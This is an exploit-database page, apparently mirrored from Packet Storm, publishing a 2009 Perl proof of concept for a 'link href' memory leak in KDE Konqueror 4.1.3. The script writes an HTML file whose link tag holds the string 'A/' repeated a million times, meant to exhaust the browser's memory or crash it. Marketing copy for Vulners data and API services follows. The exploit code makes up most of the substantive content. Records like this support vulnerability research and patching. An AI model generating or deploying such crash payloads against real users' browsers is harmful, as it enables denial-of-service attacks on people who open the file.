Lucene search
K

KDE Konqueror 4.1.3 link href Memory Leak Exploit

🗓️ 14 Jan 2009 00:00:00Reported by Jeremy BrownType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

KDE Konqueror 4.1.3 'link href' Memory Leak Exploit with Perl scrip

Code
`#!/usr/bin/perl  
# konq_lhref_ml.pl  
# KDE Konqueror 4.1.3 'link href' Memory Leak Exploit  
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]  
#  
# Software should be able to handle any kind of input and still perform correct operations.  
# Webkit > KHTML -- stability-wise, anyways  
  
$filename = $ARGV[0];  
if(!defined($filename))  
{  
  
print "Usage: $0 <filename.html>\n";  
  
}  
  
$head = "<html>" . "\n";  
$trig = "<link href = \"" . "A/" x 1000000 . "\";";  
$foot = "\n" . "</html>";  
  
$data = $head . $trig . $foot;  
  
open(FILE, '>' . $filename);  
print FILE $data;  
close(FILE);  
  
exit;`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2009 00:00Current
0.4Low risk
Vulners AI Score0.4
30